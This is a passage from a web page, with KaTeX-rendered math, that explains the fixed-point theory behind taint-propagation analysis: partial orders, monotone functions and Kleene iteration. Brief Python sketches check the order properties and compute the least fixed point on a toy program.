style="height:0.7519em"><span 
style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∧</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span 
class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⟹</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" 
style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span></span></span></span>).</p>
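<p>The three properties can also be checked mechanically on a small instance. The sketch below is only an illustration: it assumes the order compares tuples of sets componentwise by inclusion, and the two-variable universe, the tuple length of two, and the helper names <code>powerset</code> and <code>leq</code> are made up for the example.</p>
<pre><code class="language-python">from itertools import combinations, product


def powerset(universe):
    """Return every subset of `universe` as a frozenset."""
    items = sorted(universe)
    return [frozenset(c) for r in range(len(items) + 1) for c in combinations(items, r)]


def leq(xs, ys):
    """Componentwise order: xs is below ys when every xs[i] is a subset of ys[i]."""
    return len(xs) == len(ys) and all(x.issubset(y) for x, y in zip(xs, ys))


# Hypothetical universe of two variables and tuples of length two,
# chosen only to keep the exhaustive search small.
subsets = powerset({"a", "b"})
states = list(product(subsets, repeat=2))  # 4 * 4 = 16 tuples

reflexive = all(leq(s, s) for s in states)
transitive = all(
    leq(s, u)
    for s, t, u in product(states, repeat=3)
    if leq(s, t) and leq(t, u)
)
antisymmetric = all(
    s == t
    for s, t in product(states, repeat=2)
    if leq(s, t) and leq(t, s)
)

print(reflexive, transitive, antisymmetric)
</code></pre>
<p>An exhaustive check like this is not a proof for arbitrary universes, but it is a cheap sanity test that the definition behaves the way the argument above says it should.</p>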
<p>A function <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> is monotone over the partial order <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo>⊑</mo></mrow><annotation encoding="application/x-tex">\sqsubseteq</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.7719em;vertical-align:-0.136em"></span><span class="mrel">⊑</span></span></span></span> if, for all <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span> and <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><msup><mi>X</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msup><mo 
stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X'}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.6779em"><span style="top:-2.989em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span></span></span></span></span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span>,</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo>⊑</mo><mover accent="true"><msup><mi>X</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msup><mo stretchy="true">‾</mo></mover><mtext>  </mtext><mo>⟹</mo><mtext>  </mtext><mi>F</mi><mo stretchy="false">(</mo><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo stretchy="false">)</mo><mo>⊑</mo><mi>F</mi><mo stretchy="false">(</mo><mover accent="true"><msup><mi>X</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msup><mo stretchy="true">‾</mo></mover><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">\overline{X} \sqsubseteq \overline{X'} \implies F(\overline{X}) \sqsubseteq F(\overline{X'})</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0193em;vertical-align:-0.136em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.9073em;vertical-align:-0.024em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span 
class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.6779em"><span style="top:-2.989em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span></span></span></span></span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⟹</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.1333em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.1333em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord overline"><span class="vlist-t"><span 
class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.6779em"><span style="top:-2.989em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span></span></span></span></span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mclose">)</span></span></span></span></span>
<p>What does this say? It means that "larger" or equal inputs lead to "larger" or equal outputs. Here, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> is monotone because applying the propagation rules to a "larger" or equal set of
"current" tainted variables yields a "larger" or equal set of new tainted variables. To see this, note that once a variable is marked as tainted, it remains tainted,
while an untainted variable can become tainted as new tainted variables are discovered: the rules only ever add taint, so enlarging the input can never shrink the output.</p>
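<p>Monotonicity can be tested by brute force on a toy program. This is a simplified sketch, not the analysis itself: it collapses the state to a single set of tainted variables, and the assignments, the source set, and the helper names are all hypothetical.</p>
<pre><code class="language-python">from itertools import combinations

# Hypothetical program: each pair is (assigned variable, variables read on the right-hand side).
ASSIGNMENTS = [("b", {"a"}), ("c", {"b"}), ("d", {"c", "e"})]
SOURCES = frozenset({"a"})  # assumed taint sources
VARIABLES = ["a", "b", "c", "d", "e"]


def F(tainted):
    """One round of propagation: keep what is tainted, add the sources,
    and add every variable assigned from at least one tainted variable."""
    derived = {dst for dst, reads in ASSIGNMENTS if not reads.isdisjoint(tainted)}
    return frozenset(tainted) | SOURCES | derived


def flip(tainted):
    """Deliberately non-monotone: returns the variables that are NOT in the input."""
    return frozenset(VARIABLES) - frozenset(tainted)


def all_subsets(items):
    """Every subset of `items`, as frozensets."""
    return [frozenset(c) for r in range(len(items) + 1) for c in combinations(items, r)]


def is_monotone(f, items):
    """Check that x being a subset of y implies f(x) is a subset of f(y), for all pairs."""
    subsets = all_subsets(items)
    return all(f(x).issubset(f(y)) for x in subsets for y in subsets if x.issubset(y))


print(is_monotone(F, VARIABLES))
print(is_monotone(flip, VARIABLES))
</code></pre>
<p>The <code>flip</code> function is included only as a contrast: it removes elements as its input grows, which is exactly what the propagation rules never do.</p>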
<p>This ensures that repeating <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> will progressively grow the set of tainted variables. Since a program has only finitely many variables, the set cannot grow forever, so the iteration, started from the empty set, converges at the least fixed point. This provides us with a way to
compute the least fixed point of <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span>.</p>
<p>Formally, this is Kleene's fixed-point theorem. (The theorem is usually stated for Scott-continuous functions; on a finite domain like ours, every monotone function is Scott-continuous.) The least fixed point of the monotone function <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> is the limit of the ascending chain obtained by applying <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> repeatedly
starting from the least element <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi mathvariant="normal">⊥</mi></mrow><annotation encoding="application/x-tex">\bot</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6944em"></span><span class="mord">⊥</span></span></span></span> (here, the empty set):</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right" columnspacing=""><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mtext>lfp</mtext><mo stretchy="false">(</mo><mi>F</mi><mo stretchy="false">)</mo><mo>=</mo><munder><mo>⋁</mo><mrow><mi>n</mi><mo>≥</mo><mn>0</mn></mrow></munder><msup><mi>F</mi><mi>n</mi></msup><mo stretchy="false">(</mo><mi mathvariant="normal">⊥</mi><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{align*}
\text{lfp}(F) = \bigvee_{n \geq 0} F^n(\bot)
\end{align*}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:2.7123em;vertical-align:-1.1061em"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.6061em"><span style="top:-3.6061em"><span class="pstrut" style="height:3.05em"></span><span class="mord"><span class="mord text"><span class="mord">lfp</span></span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mop op-limits"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.05em"><span style="top:-1.8829em;margin-left:0em"><span class="pstrut" style="height:3.05em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">n</span><span class="mrel mtight">≥</span><span class="mord mtight">0</span></span></span></span><span style="top:-3.05em"><span class="pstrut" style="height:3.05em"></span><span><span class="mop op-symbol large-op">⋁</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.3623em"><span></span></span></span></span></span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7144em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span></span></span></span></span><span 
class="mopen">(</span><span class="mord">⊥</span><span class="mclose">)</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.1061em"><span></span></span></span></span></span></span></span></span></span></span></span>
<p>where <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msup><mi>F</mi><mi>n</mi></msup></mrow><annotation encoding="application/x-tex">F^n</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.6644em"><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span></span></span></span></span></span></span></span> is the <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>n</mi></mrow><annotation encoding="application/x-tex">n</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.4306em"></span><span class="mord mathnormal">n</span></span></span></span>-fold composition of <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> with itself, and <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo>⋁</mo></mrow><annotation encoding="application/x-tex">\bigvee</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" 
style="height:1em;vertical-align:-0.25em"></span><span class="mop op-symbol small-op" style="position:relative;top:0em">⋁</span></span></span></span> denotes the least upper bound.</p>
<p>To see this, consider the sequence <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mn>0</mn></msub><mo>=</mo><mi mathvariant="normal">⊥</mi></mrow><annotation encoding="application/x-tex">\overline{X}_0 = \bot</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">0</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.6944em"></span><span class="mord">⊥</span></span></span></span>, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo 
stretchy="true">‾</mo></mover><mrow><mi>i</mi><mo>+</mo><mn>1</mn></mrow></msub><mo>=</mo><mi>F</mi><mo stretchy="false">(</mo><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>i</mi></msub><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">\overline{X}_{i+1} = F(\overline{X}_i)</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0917em;vertical-align:-0.2083em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">i</span><span class="mbin mtight">+</span><span class="mord mtight">1</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2083em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.1333em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord"><span class="mord overline"><span class="vlist-t"><span 
class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mclose">)</span></span></span></span>.</p>
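<p>The sequence above translates directly into a loop. Here is a minimal sketch, assuming a toy propagation function over a single set of tainted variables; the program, the source set, and the name <code>kleene_chain</code> are illustrative and not taken from the analysis itself.</p>
<pre><code class="language-python"># Hypothetical program: each pair is (assigned variable, variables read on the right-hand side).
ASSIGNMENTS = [("b", {"a"}), ("c", {"b"}), ("d", {"c", "e"})]
SOURCES = frozenset({"a"})  # assumed taint sources


def F(tainted):
    """One round of propagation: keep what is tainted, add the sources,
    and add every variable assigned from at least one tainted variable."""
    derived = {dst for dst, reads in ASSIGNMENTS if not reads.isdisjoint(tainted)}
    return frozenset(tainted) | SOURCES | derived


def kleene_chain(f, bottom=frozenset()):
    """Return [X_0, X_1, ..., X_n] with X_0 = bottom and X_{i+1} = f(X_i),
    stopping at the first X_n that satisfies f(X_n) == X_n."""
    chain = [bottom]
    while True:
        nxt = f(chain[-1])
        if nxt == chain[-1]:
            return chain
        chain.append(nxt)


chain = kleene_chain(F)
for i, state in enumerate(chain):
    print(i, sorted(state))

lfp = chain[-1]  # the last element is a fixed point of F
</code></pre>
<p>On this toy program the chain is the empty set, then {a}, {a, b}, {a, b, c}, and {a, b, c, d}, after which applying <code>F</code> changes nothing. The variable <code>e</code> is never tainted because nothing tainted flows into it. The loop terminates here only because the set of variables is finite and each step can only add elements.</p>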
<p>Since <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> is monotone, we have <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mn>0</mn></msub><mo>⊑</mo><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mn>1</mn></msub><mo>⊑</mo><mo>⋯</mo><mo>⊑</mo><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>n</mi></msub></mrow><annotation encoding="application/x-tex">\overline{X}_0 \sqsubseteq \overline{X}_1 \sqsubseteq \cdots \sqsubseteq \overline{X}_n</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">0</span></span></span></span><span 
class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">1</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.7719em;vertical-align:-0.136em"></span><span class="minner">⋯</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span 
style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span></span></span></span>. Consider the last element of the chain, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>n</mi></msub></mrow><annotation encoding="application/x-tex">\overline{X}_n</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" 